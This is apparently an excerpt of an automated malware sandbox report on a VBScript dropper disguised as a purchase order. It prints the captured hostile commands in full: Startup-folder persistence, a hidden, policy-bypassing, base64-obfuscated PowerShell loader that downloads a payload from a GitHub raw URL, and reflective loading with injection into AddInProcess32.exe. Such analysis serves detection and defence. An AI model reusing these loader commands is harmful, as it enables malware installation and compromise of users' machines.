Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\estercoreiro.vbs");IFileSystem3.CopyFile("C:\Windows\system32\Purchase Order - PO14895.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\estercoreiro.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJyk", "0", "false")

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?

Obfuscated command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

11_2_0041A8DA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C302FD push ds; iretd	5_2_00007FF886C303E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C30CD3 push ds; iretd	5_2_00007FF886C30CDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C34AF2 push eax; retf	5_2_00007FF886C34B09
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C31045 pushad ; iretd	5_2_00007FF886C3105A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C3105B pushad ; iretd	5_2_00007FF886C3105A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF886C422D0 push eax; iretd	6_2_00007FF886C4233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF886C40B9A push ds; iretd	6_2_00007FF886C40BA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF886C4233E push eax; iretd	6_2_00007FF886C4233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886C40B83 push ds; iretd	8_2_00007FF886C40B82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886C40B5D push ds; iretd	8_2_00007FF886C40B82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886C47F26 push esp; iretd	8_2_00007FF886C47F2C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886D17B4E push ebp; iretd	8_2_00007FF886D17B50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886D17EFE push ecx; iretd	8_2_00007FF886D17EFF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886D17CDC push ebx; iretd	8_2_00007FF886D17CDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886D18037 push eax; iretd	8_2_00007FF886D18038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004000D8 push es; iretd	11_2_004000D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040008C push es; iretd	11_2_0040008D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004542E6 push ecx; ret	11_2_004542F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0045B4FD push esi; ret	11_2_0045B506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00432BD6 push ecx; ret	11_2_00432BE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00454C08 push eax; ret	11_2_00454C26

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_004063C6 ShellExecuteW,URLDownloadToFileW,

11_2_004063C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_00418A00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

11_2_0041A8DA

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
